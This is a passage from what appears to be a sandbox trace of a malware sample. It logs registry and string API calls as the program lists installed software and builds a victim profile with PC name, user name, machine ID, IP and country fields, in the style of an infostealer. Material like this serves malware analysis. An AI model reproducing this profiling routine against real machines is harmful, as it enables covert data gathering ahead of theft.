Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\n" [0175.941] RegCloseKey (hKey=0x354) returned 0x0 [0175.941] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x31, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0115-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.941] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0115-0409-0000-0000000FF1CE}") returned 90 [0175.941] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0115-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.942] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Office Shared Setup Metadata MUI (English) 2016", lpcbData=0x197fd4*=0x3a) returned 0x0 [0175.942] lstrlenA (lpString="Microsoft Office Shared Setup Metadata MUI (English) 2016") returned 57 [0175.942] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Office Shared Setup Metadata MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016" [0175.942] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.942] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 " [0175.942] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001" [0175.942] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 